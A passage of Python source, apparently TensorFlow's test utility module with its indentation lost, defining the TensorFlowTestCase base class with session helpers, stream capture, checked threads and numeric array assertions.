b: Second input to tf.linalg.matmul
args: Other positional arguments to tf.linalg.matmul
**kwargs: Other keyword arguments to tf.linalg.matmul
Returns:
A tensor with the same type as `a`.
"""
if config.tensor_float_32_execution_enabled() and a.dtype == "float32":
a = math_ops.cast(a, "float64")
b = math_ops.cast(b, "float64")
ret = math_ops.matmul(a, b, *args, **kwargs)
return math_ops.cast(ret, a.dtype)
else:
return math_ops.matmul(a, b, *args, **kwargs)
class EagerSessionWarner(object):
def __getattr__(self, attr):
raise AttributeError(
"Trying to access properties or call methods on the result of "
"self.session(), self.cached_session(), etc while eager execution "
"is enabled. If you're porting this test case to TF 2.0, either "
"adapt the test to work with eager execution or insert a call to "
"tf.disable_eager_execution() in the main() function of this test "
"file.")
@tf_export("test.TestCase")
class TensorFlowTestCase(googletest.TestCase):
"""Base class for tests that need to test TensorFlow."""
def __init__(self, methodName="runTest"): # pylint: disable=invalid-name
super(TensorFlowTestCase, self).__init__(methodName)
if is_xla_enabled():
pywrap_tf_session.TF_SetXlaAutoJitMode("2")
pywrap_tf_session.TF_SetXlaMinClusterSize(1)
pywrap_tf_session.TF_SetXlaEnableLazyCompilation(False)
pywrap_tf_session.TF_SetTfXlaCpuGlobalJit(True)
# Constant folding secretly runs code on TF:Classic CPU, so we also
# disable it here.
pywrap_tf_session.TF_SetXlaConstantFoldingDisabled(True)
if is_mlir_bridge_enabled():
context.context().enable_mlir_bridge = True
self._threads = []
self._tempdir = None
self._cached_session = None
self._test_start_time = None
def setUp(self):
self._ClearCachedSession()
random.seed(random_seed.DEFAULT_GRAPH_SEED)
np.random.seed(random_seed.DEFAULT_GRAPH_SEED)
# Note: The following line is necessary because some test methods may error
# out from within nested graph contexts (e.g., via assertRaises and
# assertRaisesRegexp), which may leave ops._default_graph_stack non-empty
# under certain versions of Python. That would cause
# ops.reset_default_graph() to throw an exception if the stack were not
# cleared first.
ops._default_graph_stack.reset() # pylint: disable=protected-access
ops.reset_default_graph()
random_seed.set_random_seed(random_seed.DEFAULT_GRAPH_SEED)
# Reset summary writer in case another test used set_as_default() with their
# summary writer.
summary_state = summary_ops_v2._summary_state # pylint: disable=protected-access
summary_state.writer = None
# Avoiding calling setUp() for the poorly named test_session method.
if self.id().endswith(".test_session"):
self.skipTest("Not a test.")
self._test_start_time = time.time()
def tearDown(self):
# If a subclass overrides setUp and doesn't call the parent class's setUp,
# then we may not have set the start time.
if self._test_start_time is not None:
logging.info("time(%s): %ss", self.id(),
round(time.time() - self._test_start_time, 2))
for thread in self._threads:
thread.check_termination()
self._ClearCachedSession()
def _ClearCachedSession(self):
if self._cached_session is not None:
self._cached_session.close()
self._cached_session = None
def get_temp_dir(self):
"""Returns a unique temporary directory for the test to use.
If you call this method multiple times during in a test, it will return the
same folder. However, across different runs the directories will be
different. This will ensure that across different runs tests will not be
able to pollute each others environment.
If you need multiple unique directories within a single test, you should
use tempfile.mkdtemp as follows:
tempfile.mkdtemp(dir=self.get_temp_dir()):
Returns:
string, the path to the unique temporary directory created for this test.
"""
if not self._tempdir:
self._tempdir = tempfile.mkdtemp(dir=googletest.GetTempDir())
return self._tempdir
@contextlib.contextmanager
def captureWritesToStream(self, stream):
"""A context manager that captures the writes to a given stream.
This context manager captures all writes to a given stream inside of a
`CapturedWrites` object. When this context manager is created, it yields
the `CapturedWrites` object. The captured contents can be accessed by
calling `.contents()` on the `CapturedWrites`.
For this function to work, the stream must have a file descriptor that
can be modified using `os.dup` and `os.dup2`, and the stream must support
a `.flush()` method. The default python sys.stdout and sys.stderr are
examples of this. Note that this does not work in Colab or Jupyter
notebooks, because those use alternate stdout streams.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
input = [1.0, 2.0, 3.0, 4.0, 5.0]
with self.captureWritesToStream(sys.stdout) as captured:
result = MyOperator(input).eval()
self.assertStartsWith(captured.contents(), "This was printed.")
```
Args:
stream: The stream whose writes should be captured. This stream must have
a file descriptor, support writing via using that file descriptor, and
must have a `.flush()` method.
Yields:
A `CapturedWrites` object that contains all writes to the specified stream
made during this context.
"""
stream.flush()
fd = stream.fileno()
tmp_file_path = tempfile.mktemp(dir=self.get_temp_dir())
tmp_file = open(tmp_file_path, "w")
orig_fd = os.dup(fd)
os.dup2(tmp_file.fileno(), fd)
try:
yield CapturedWrites(tmp_file_path)
finally:
tmp_file.close()
os.dup2(orig_fd, fd)
def _AssertProtoEquals(self, a, b, msg=None):
"""Asserts that a and b are the same proto.
Uses ProtoEq() first, as it returns correct results
for floating point attributes, and then use assertProtoEqual()
in case of failure as it provides good error messages.
Args:
a: a proto.
b: another proto.
msg: Optional message to report on failure.
"""
if not compare.ProtoEq(a, b):
compare.assertProtoEqual(self, a, b, normalize_numbers=True, msg=msg)
def assertProtoEquals(self, expected_message_maybe_ascii, message, msg=None):
"""Asserts that message is same as parsed expected_message_ascii.
Creates another prototype of message, reads the ascii message into it and
then compares them using self._AssertProtoEqual().
Args:
expected_message_maybe_ascii: proto message in original or ascii form.
message: the message to validate.
msg: Optional message to report on failure.
"""
msg = msg if msg else ""
if isinstance(expected_message_maybe_ascii, type(message)):
expected_message = expected_message_maybe_ascii
self._AssertProtoEquals(expected_message, message)
elif isinstance(expected_message_maybe_ascii, (str, bytes)):
expected_message = type(message)()
text_format.Merge(
expected_message_maybe_ascii,
expected_message,
descriptor_pool=descriptor_pool.Default())
self._AssertProtoEquals(expected_message, message, msg=msg)
else:
assert False, ("Can't compare protos of type %s and %s. %s" %
(type(expected_message_maybe_ascii), type(message), msg))
def assertProtoEqualsVersion(
self,
expected,
actual,
producer=versions.GRAPH_DEF_VERSION,
min_consumer=versions.GRAPH_DEF_VERSION_MIN_CONSUMER,
msg=None):
expected = "versions { producer: %d min_consumer: %d };\n%s" % (
producer, min_consumer, expected)
self.assertProtoEquals(expected, actual, msg=msg)
def assertStartsWith(self, actual, expected_start, msg=None):
"""Assert that actual.startswith(expected_start) is True.
Args:
actual: str
expected_start: str
msg: Optional message to report on failure.
"""
if not actual.startswith(expected_start):
fail_msg = "%r does not start with %r" % (actual, expected_start)
fail_msg += " : %r" % (msg) if msg else ""
self.fail(fail_msg)
def _eval_tensor(self, tensor):
if tensor is None:
return None
elif callable(tensor):
return self._eval_helper(tensor())
else:
try:
if sparse_tensor.is_sparse(tensor):
return sparse_tensor.SparseTensorValue(tensor.indices.numpy(),
tensor.values.numpy(),
tensor.dense_shape.numpy())
elif ragged_tensor.is_ragged(tensor):
return ragged_tensor_value.RaggedTensorValue(
self._eval_tensor(tensor.values),
self._eval_tensor(tensor.row_splits))
elif isinstance(tensor, ops.IndexedSlices):
return ops.IndexedSlicesValue(
values=tensor.values.numpy(),
indices=tensor.indices.numpy(),
dense_shape=tensor.dense_shape.numpy())
# Convert tensors and composite tensors to numpy arrays.
return nest.map_structure(lambda t: t.numpy(), tensor,
expand_composites=True)
except AttributeError as e:
six.raise_from(ValueError("Unsupported type %s." % type(tensor)), e)
def _eval_helper(self, tensors):
if tensors is None:
return None
return nest.map_structure(self._eval_tensor, tensors)
def evaluate(self, tensors):
"""Evaluates tensors and returns numpy values.
Args:
tensors: A Tensor or a nested list/tuple of Tensors.
Returns:
tensors numpy values.
"""
if context.executing_eagerly():
return self._eval_helper(tensors)
else:
sess = ops.get_default_session()
if sess is None:
with self.test_session() as sess:
return sess.run(tensors)
else:
return sess.run(tensors)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def session(self, graph=None, config=None, use_gpu=False, force_gpu=False):
"""A context manager for a TensorFlow Session for use in executing tests.
Note that this will set this session and the graph as global defaults.
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if
`use_gpu` is True, TensorFlow tries to run as many ops on the GPU as
possible. If both `force_gpu and `use_gpu` are False, all ops are pinned to
the CPU.
Example:
``` python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.session(use_gpu=True):
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0]
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Yields:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if context.executing_eagerly():
yield EagerSessionWarner()
else:
with self._create_session(graph, config, force_gpu) as sess:
with self._constrain_devices_and_set_default(sess, use_gpu, force_gpu):
yield sess
@contextlib.contextmanager
def cached_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Returns a TensorFlow Session for use in executing tests.
This method behaves differently than self.session(): for performance reasons
`cached_session` will by default reuse the same session within the same
test. The session returned by this function will only be closed at the end
of the test (in the TearDown function).
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if
`use_gpu` is True, TensorFlow tries to run as many ops on the GPU as
possible. If both `force_gpu and `use_gpu` are False, all ops are pinned to
the CPU.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.cached_session(use_gpu=True) as sess:
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0]
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Yields:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if context.executing_eagerly():
yield FakeEagerSession(self)
else:
sess = self._get_cached_session(
graph, config, force_gpu, crash_if_inconsistent_args=True)
with self._constrain_devices_and_set_default(sess, use_gpu,
force_gpu) as cached:
yield cached
@contextlib.contextmanager
@deprecation.deprecated(None, "Use `self.session()` or "
"`self.cached_session()` instead.")
def test_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Use cached_session instead."""
if self.id().endswith(".test_session"):
self.skipTest(
"Tests that have the name \"test_session\" are automatically skipped "
"by TensorFlow test fixture, as the name is reserved for creating "
"sessions within tests. Please rename your test if you have a test "
"with this name.")
if context.executing_eagerly():
yield None
else:
if graph is None:
sess = self._get_cached_session(
graph, config, force_gpu, crash_if_inconsistent_args=False)
with self._constrain_devices_and_set_default(sess, use_gpu,
force_gpu) as cached:
yield cached
else:
with self.session(graph, config, use_gpu, force_gpu) as sess:
yield sess
# pylint: enable=g-doc-return-or-yield
class _CheckedThread(object):
"""A wrapper class for Thread that asserts successful completion.
This class should be created using the TensorFlowTestCase.checkedThread()
method.
"""
def __init__(self, testcase, target, args=None, kwargs=None):
"""Constructs a new instance of _CheckedThread.
Args:
testcase: The TensorFlowTestCase for which this thread is being created.
target: A callable object representing the code to be executed in the
thread.
args: A tuple of positional arguments that will be passed to target.
kwargs: A dictionary of keyword arguments that will be passed to target.
"""
self._testcase = testcase
self._target = target
self._args = () if args is None else args
self._kwargs = {} if kwargs is None else kwargs
self._thread = threading.Thread(target=self._protected_run)
self._exception = None
self._is_thread_joined = False
def _protected_run(self):
"""Target for the wrapper thread. Sets self._exception on failure."""
try:
self._target(*self._args, **self._kwargs)
except Exception as e: # pylint: disable=broad-except
self._exception = e
def start(self):
"""Starts the thread's activity.
This must be called at most once per _CheckedThread object. It arranges
for the object's target to be invoked in a separate thread of control.
"""
self._thread.start()
def join(self):
"""Blocks until the thread terminates.
Raises:
self._testcase.failureException: If the thread terminates with due to
an exception.
"""
self._is_thread_joined = True
self._thread.join()
if self._exception is not None:
self._testcase.fail("Error in checkedThread: %s" % str(self._exception))
def is_alive(self):
"""Returns whether the thread is alive.
This method returns True just before the run() method starts
until just after the run() method terminates.
Returns:
True if the thread is alive, otherwise False.
"""
return self._thread.is_alive()
def check_termination(self):
"""Returns whether the checked thread was properly used and did terminate.
Every checked thread should be "join"ed after starting, and before the
test tears down. If it is not joined, it is possible the thread will hang
and cause flaky failures in tests.
Raises:
self._testcase.failureException: If check_termination was called before
thread was joined.
RuntimeError: If the thread is not terminated. This means thread was not
joined with the main thread.
"""
if self._is_thread_joined:
if self.is_alive():
raise RuntimeError(
"Thread was not joined with main thread, and is still running "
"when the test finished.")
else:
self._testcase.fail("A checked thread was not joined.")
def checkedThread(self, target, args=None, kwargs=None):
"""Returns a Thread wrapper that asserts 'target' completes successfully.
This method should be used to create all threads in test cases, as
otherwise there is a risk that a thread will silently fail, and/or
assertions made in the thread will not be respected.
Args:
target: A callable object to be executed in the thread.
args: The argument tuple for the target invocation. Defaults to ().
kwargs: A dictionary of keyword arguments for the target invocation.
Defaults to {}.
Returns:
A wrapper for threading.Thread that supports start() and join() methods.
"""
ret = TensorFlowTestCase._CheckedThread(self, target, args, kwargs)
self._threads.append(ret)
return ret
# pylint: enable=invalid-name
@py_func_if_in_function
def assertNear(self, f1, f2, err, msg=None):
"""Asserts that two floats are near each other.
Checks that |f1 - f2| < err and asserts a test failure
if not.
Args:
f1: A float value.
f2: A float value.
err: A float value.
msg: An optional string message to append to the failure message.
"""
# f1 == f2 is needed here as we might have: f1, f2 = inf, inf
self.assertTrue(
f1 == f2 or math.fabs(f1 - f2) <= err, "%f != %f +/- %f%s" %
(f1, f2, err, " (%s)" % msg if msg is not None else ""))
@py_func_if_in_function
def assertArrayNear(self, farray1, farray2, err, msg=None):
"""Asserts that two float arrays are near each other.
Checks that for all elements of farray1 and farray2
|f1 - f2| < err. Asserts a test failure if not.
Args:
farray1: a list of float values.
farray2: a list of float values.
err: a float value.
msg: Optional message to report on failure.
"""
self.assertEqual(len(farray1), len(farray2), msg=msg)
for f1, f2 in zip(farray1, farray2):
self.assertNear(float(f1), float(f2), err, msg=msg)
def _NDArrayNear(self, ndarray1, ndarray2, err):
return np.linalg.norm(ndarray1 - ndarray2) < err
@py_func_if_in_function
def assertNDArrayNear(self, ndarray1, ndarray2, err, msg=None):
"""Asserts that two numpy arrays have near values.
Args:
ndarray1: a numpy ndarray.
ndarray2: a numpy ndarray.
err: a float. The maximum absolute difference allowed.
msg: Optional message to report on failure.
"""
self.assertTrue(self._NDArrayNear(ndarray1, ndarray2, err), msg=msg)
def _GetNdArray(self, a):
# If a is tensor-like then convert it to ndarray
if tensor_util.is_tensor(a):
if isinstance(a, ops._EagerTensorBase):
a = a.numpy()
else:
a = self.evaluate(a)
if not isinstance(a, np.ndarray):
return np.array(a)
return a
def _assertArrayLikeAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# When the array rank is small, print its contents. Numpy array printing is
# implemented using inefficient recursion so prints can cause tests to
# time out.
if a.shape != b.shape and (b.ndim <= 3 or b.size < 500):
shape_mismatch_msg = ("Shape mismatch: expected %s, got %s with contents "
"%s.") % (a.shape, b.shape, b)
else:
shape_mismatch_msg = "Shape mismatch: expected %s, got %s." % (a.shape,
b.shape)
self.assertEqual(a.shape, b.shape, shape_mismatch_msg)
msgs = [msg]
if not np.allclose(a, b, rtol=rtol, atol=atol):
# Adds more details to np.testing.assert_allclose.
#
# NOTE: numpy.allclose (and numpy.testing.assert_allclose)
# checks whether two arrays are element-wise equal within a
# tolerance. The relative difference (rtol * abs(b)) and the
# absolute difference atol are added together to compare against
# the absolute difference between a and b. Here, we want to
# tell user which elements violate such conditions.
cond = np.logical_or(
np.abs(a - b) > atol + rtol * np.abs(b),
np.isnan(a) != np.isnan(b))
if a.ndim:
x = a[np.where(cond)]
y = b[np.where(cond)]
msgs.append("not close where = {}".format(np.where(cond)))
else:
# np.where is broken for scalars
x, y = a, b
msgs.append("not close lhs = {}".format(x))
msgs.append("not close rhs = {}".format(y))
msgs.append("not close dif = {}".format(np.abs(x - y)))
msgs.append("not close tol = {}".format(atol + rtol * np.abs(y)))
msgs.append("dtype = {}, shape = {}".format(a.dtype, a.shape))
# TODO(xpan): There seems to be a bug:
# tensorflow/compiler/tests:binary_ops_test pass with float32
# nan even though the equal_nan is False by default internally.
np.testing.assert_allclose(
a, b, rtol=rtol, atol=atol, err_msg="\n".join(msgs), equal_nan=True)
def _assertAllCloseRecursive(self,
a,
b,
rtol=1e-6,
atol=1e-6,
path=None,
msg=None):
path = path or []
path_str = (("[" + "][".join(str(p) for p in path) + "]") if path else "")
msg = msg if msg else ""
# Check if a and/or b are namedtuples.
if hasattr(a, "_asdict"):
a = a._asdict()
if hasattr(b, "_asdict"):
b = b._asdict()
a_is_dict = isinstance(a, collections_abc.Mapping)
if a_is_dict != isinstance(b, collections_abc.Mapping):
raise ValueError("Can't compare dict to non-dict, a%s vs b%s. %s" %
(path_str, path_str, msg))
if a_is_dict:
self.assertItemsEqual(
a.keys(),
b.keys(),
msg="mismatched keys: a%s has keys %s, but b%s has keys %s. %s" %
(path_str, a.keys(), path_str, b.keys(), msg))
for k in a:
path.append(k)
self._assertAllCloseRecursive(
a[k], b[k], rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
elif isinstance(a, (list, tuple)):
# Try to directly compare a, b as ndarrays; if not work, then traverse
# through the sequence, which is more expensive.
try:
a_as_ndarray = self._GetNdArray(a)
b_as_ndarray = self._GetNdArray(b)
self._assertArrayLikeAllClose(
a_as_ndarray,
b_as_ndarray,
rtol=rtol,
atol=atol,
msg="Mismatched value: a%s is different from b%s. %s" %
(path_str, path_str, msg))
except (ValueError, TypeError) as e:
if len(a) != len(b):
raise ValueError(
"Mismatched length: a%s has %d items, but b%s has %d items. %s" %
(path_str, len(a), path_str, len(b), msg))
for idx, (a_ele, b_ele) in enumerate(zip(a, b)):
path.append(str(idx))
self._assertAllCloseRecursive(
a_ele, b_ele, rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
# a and b are ndarray like objects
else:
try:
self._assertArrayLikeAllClose(
a,
b,
rtol=rtol,
atol=atol,
msg=("Mismatched value: a%s is different from b%s. %s" %
(path_str, path_str, msg)))
except TypeError as e:
msg = ("Error: a%s has %s, but b%s has %s. %s" %
(path_str, type(a), path_str, type(b), msg))
e.args = ((e.args[0] + " : " + msg,) + e.args[1:])
raise
@py_func_if_in_function
def assertAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
"""Asserts that two structures of numpy arrays or Tensors, have near values.
`a` and `b` can be arbitrarily nested structures. A layer of a nested
structure can be a `dict`, `namedtuple`, `tuple` or `list`.
Note: the implementation follows
[`numpy.allclose`](https://docs.scipy.org/doc/numpy/reference/generated/numpy.allclose.html)
(and numpy.testing.assert_allclose). It checks whether two arrays are
element-wise equal within a tolerance. The relative difference
(`rtol * abs(b)`) and the absolute difference `atol` are added together
to compare against the absolute difference between `a` and `b`.
Args:
a: The expected numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor), or any arbitrarily nested of
structure of these.
b: The actual numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor), or any arbitrarily nested of
structure of these.
rtol: relative tolerance.
atol: absolute tolerance.
msg: Optional message to report on failure.
Raises:
ValueError: if only one of `a[p]` and `b[p]` is a dict or
`a[p]` and `b[p]` have different length, where `[p]` denotes a path
to the nested structure, e.g. given `a = [(1, 1), {'d': (6, 7)}]` and
`[p] = [1]['d']`, then `a[p] = (6, 7)`.
"""
if ragged_tensor.is_ragged(a) or ragged_tensor.is_ragged(b):
return self._assertRaggedClose(a, b, rtol, atol, msg)
self._assertAllCloseRecursive(a, b, rtol=rtol, atol=atol, msg=msg)
@py_func_if_in_function
def assertAllCloseAccordingToType(self,
a,
b,
rtol=1e-6,
atol=1e-6,
float_rtol=1e-6,
float_atol=1e-6,
half_rtol=1e-3,
half_atol=1e-3,
bfloat16_rtol=1e-2,
bfloat16_atol=1e-2,
msg=None):
"""Like assertAllClose, but also suitable for comparing fp16 arrays.
In particular, the tolerance is reduced to 1e-3 if at least
one of the arguments is of type float16.
Args:
a: the expected numpy ndarray or anything can be converted to one.
b: the actual numpy ndarray or anything can be converted to one.
rtol: relative tolerance.
atol: absolute tolerance.
float_rtol: relative tolerance for float32.
float_atol: absolute tolerance for float32.
half_rtol: relative tolerance for float16.
half_atol: absolute tolerance for float16.
bfloat16_rtol: relative tolerance for bfloat16.
bfloat16_atol: absolute tolerance for bfloat16.
msg: Optional message to report on failure.
"""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# types with lower tol are put later to overwrite previous ones.
if (a.dtype == np.float32 or b.dtype == np.float32 or
a.dtype == np.complex64 or b.dtype == np.complex64):
rtol = max(rtol, float_rtol)
atol = max(atol, float_atol)
if a.dtype == np.float16 or b.dtype == np.float16:
rtol = max(rtol, half_rtol)
atol = max(atol, half_atol)
if (a.dtype == dtypes.bfloat16.as_numpy_dtype or
b.dtype == dtypes.bfloat16.as_numpy_dtype):
rtol = max(rtol, bfloat16_rtol)
atol = max(atol, bfloat16_atol)
self.assertAllClose(a, b, rtol=rtol, atol=atol, msg=msg)
@py_func_if_in_function
def assertNotAllClose(self, a, b, **kwargs):
"""Assert that two numpy arrays, or Tensors, do not have near values.
Args:
a: the first value to compare.
b: the second value to compare.
**kwargs: additional keyword arguments to be passed to the underlying
`assertAllClose` call.
Raises:
AssertionError: If `a` and `b` are unexpectedly close at all elements.
"""
try:
self.assertAllClose(a, b, **kwargs)
except AssertionError:
return
raise AssertionError("The two values are close at all elements")
@py_func_if_in_function
def assertAllEqual(self, a, b, msg=None):
"""Asserts that two numpy arrays or Tensors have the same values.
Args:
a: the expected numpy ndarray or anything can be converted to one.
b: the actual numpy ndarray or anything can be converted to one.
msg: Optional message to report on failure.
"""
if (ragged_tensor.is_ragged(a) or ragged_tensor.is_ragged(b)):
return self._assertRaggedEqual(a, b, msg)
msg = msg if msg else ""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# Arbitrary bounds so that we don't print giant tensors.
if (b.ndim <= 3 or b.size < 500):
self.assertEqual(
a.shape, b.shape, "Shape mismatch: expected %s, got %s."
" Contents: %r. \n%s." % (a.shape, b.shape, b, msg))
else:
self.assertEqual(
a.shape, b.shape, "Shape mismatch: expected %s, got %s."
" %s" % (a.shape, b.shape, msg))
same = (a == b)
if (a.dtype in [
np.float16, np.float32, np.float64, dtypes.bfloat16.as_numpy_dtype
]):
same = np.logical_or(same, np.logical_and(np.isnan(a), np.isnan(b)))
msgs = [msg]
if not np.all(same):
# Adds more details to np.testing.assert_array_equal.
diff = np.logical_not(same)
if a.ndim:
x = a[np.where(diff)]
y = b[np.where(diff)]
msgs.append("not equal where = {}".format(np.where(diff)))
else:
# np.where is broken for scalars
x, y = a, b
msgs.append("not equal lhs = %r" % x)
msgs.append("not equal rhs = %r" % y)
# Handle mixed string types as a result of PY2to3 migration. That is, the
# mixing between bytes (b-prefix strings, PY2 default) and unicodes
# (u-prefix strings, PY3 default).
if six.PY3:
if (a.dtype.kind != b.dtype.kind and
{a.dtype.kind, b.dtype.kind}.issubset({"U", "S", "O"})):
a_list = []
b_list = []
# OK to flatten `a` and `b` because they are guaranteed to have the
# same shape.
for out_list, flat_arr in [(a_list, a.flat), (b_list, b.flat)]:
for item in flat_arr:
if isinstance(item, str):
out_list.append(item.encode("utf-8"))
else:
out_list.append(item)
a = np.array(a_list)
b = np.array(b_list)
np.testing.assert_array_equal(a, b, err_msg="\n".join(msgs))
@py_func_if_in_function
def assertNotAllEqual(self, a, b, msg=None):
"""Asserts that two numpy arrays or Tensors do not have the same values.
Args:
a: the expected numpy ndarray or anything can be converted to one.
b: the actual numpy ndarray or anything can be converted to one.
msg: Optional message to report on failure.
"""
try:
self.assertAllEqual(a, b)
except AssertionError:
return
raise AssertionError("The two values are equal at all elements. %s" % msg)
@py_func_if_in_function
def assertAllGreater(self, a, comparison_target):
"""Assert element values are all greater than a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertGreater(np.min(a), comparison_target)
@py_func_if_in_function
def assertAllLess(self, a, comparison_target):
"""Assert element values are all less than a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertLess(np.max(a), comparison_target)
@py_func_if_in_function
def assertAllGreaterEqual(self, a, comparison_target):
"""Assert element values are all greater than or equal to a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertGreaterEqual(np.min(a), comparison_target)
@py_func_if_in_function
def assertAllLessEqual(self, a, comparison_target):
"""Assert element values are all less than or equal to a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertLessEqual(np.max(a), comparison_target)
def _format_subscripts(self, subscripts, value, limit=10, indent=2):
"""Generate a summary of ndarray subscripts as a list of str.
If limit == N, this method will print up to the first N subscripts on
separate
lines. A line of ellipses (...) will be appended at the end if the number of
subscripts exceeds N.
Args:
subscripts: The tensor (np.ndarray) subscripts, of the same format as
np.where()'s return value, i.e., a tuple of arrays with each array
corresponding to a dimension. E.g., (array([1, 1]), array([0, 1])).
value: (np.ndarray) value of the tensor.
limit: (int) The maximum number of indices to print.
indent: (int) Number of characters to indent at the beginning of each
line.
Returns:
(list of str) the multi-line representation of the subscripts and values,
potentially with omission at the end.
"""
lines = []
subscripts = np.transpose(subscripts)
prefix = " " * indent
for subscript in itertools.islice(subscripts, limit):
lines.append(prefix + str(subscript) + " : " +
str(value[tuple(subscript)]))
if len(subscripts) > limit:
lines.append(prefix + "...")
return lines
@py_func_if_in_function
def assertAllInRange(self,
target,
lower_bound,
upper_bound,
open_lower_bound=False,
open_upper_bound=False):
"""Assert that elements in a Tensor are all in a given range.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
lower_bound: lower bound of the range
upper_bound: upper bound of the range
open_lower_bound: (`bool`) whether the lower bound is open (i.e., > rather
than the default >=)
open_upper_bound: (`bool`) whether the upper bound is open (i.e., < rather
than the default <=)
Raises:
AssertionError:
if the value tensor does not have an ordered numeric type (float* or
int*), or
if there are nan values, or
if any of the elements do not fall in the specified range.
"""
target = self._GetNdArray(target)
if not (np.issubdtype(target.dtype, np.floating) or
np.issubdtype(target.dtype, np.integer)):
raise AssertionError(
"The value of %s does not have an ordered numeric type, instead it "
"has type: %s" % (target, target.dtype))
nan_subscripts = np.where(np.isnan(target))
if np.size(nan_subscripts):
raise AssertionError(
"%d of the %d element(s) are NaN. "
"Subscripts(s) and value(s) of the NaN element(s):\n" %
(len(nan_subscripts[0]), np.size(target)) +
"\n".join(self._format_subscripts(nan_subscripts, target)))
range_str = (("(" if open_lower_bound else "[") + str(lower_bound) + ", " +
str(upper_bound) + (")" if open_upper_bound else "]"))
violations = (
np.less_equal(target, lower_bound) if open_lower_bound else np.less(
target, lower_bound))
violations = np.logical_or(
violations,
np.greater_equal(target, upper_bound)
if open_upper_bound else np.greater(target, upper_bound))
violation_subscripts = np.where(violations)
if np.size(violation_subscripts):
raise AssertionError(
"%d of the %d element(s) are outside the range %s. " %
(len(violation_subscripts[0]), np.size(target), range_str) +
"Subscript(s) and value(s) of the offending elements:\n" +
"\n".join(self._format_subscripts(violation_subscripts, target)))
@py_func_if_in_function
def assertAllInSet(self, target, expected_set):
"""Assert that elements of a Tensor are all in a given closed set.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
expected_set: (`list`, `tuple` or `set`) The closed set that the elements
of the value of `target` are expected to fall into.
Raises:
AssertionError:
if any of the elements do not fall into `expected_set`.
"""
target = self._GetNdArray(target)
# Elements in target that are not in expected_set.
diff = np.setdiff1d(target.flatten(), list(expected_set))
if np.size(diff):
raise AssertionError("%d unique element(s) are not in the set %s: %s" %
(np.size(diff), expected_set, diff))
@py_func_if_in_function
def assertDTypeEqual(self, target, expected_dtype):
"""Assert ndarray data type is equal to expected.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
expected_dtype: Expected data type.
"""
target = self._GetNdArray(target)
if not isinstance(target, list):
arrays = [target]
for arr in arrays:
self.assertEqual(arr.dtype, expected_dtype)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def assertRaisesWithPredicateMatch(self, exception_type,
expected_err_re_or_predicate):
"""Returns a context manager to enclose code expected to raise an exception.
If the exception is an OpError, the op stack is also included in the message
predicate search.
Args:
exception_type: The expected type of exception that should be raised.
expected_err_re_or_predicate: If this is callable, it should be a function
of one argument that inspects the passed-in exception and returns True
(success) or False (please fail the test). Otherwise, the error message
is expected to match this regular expression partially.
Returns:
A context manager to surround code that is expected to raise an
exception.
"""
if callable(expected_err_re_or_predicate):
predicate = expected_err_re_or_predicate
else:
def predicate(e):
err_str = e.message if isinstance(e, errors.OpError) else str(e)
op = e.op if isinstance(e, errors.OpError) else None
while op is not None:
err_str += "\nCaused by: " + op.name
op = op._original_op # pylint: disable=protected-access
logging.info("Searching within error strings: '%s' within '%s'",
expected_err_re_or_predicate, err_str)
return re.search(expected_err_re_or_predicate, err_str)
try:
yield
self.fail(exception_type.__name__ + " not raised")
except Exception as e: # pylint: disable=broad-except
if not isinstance(e, exception_type) or not predicate(e):
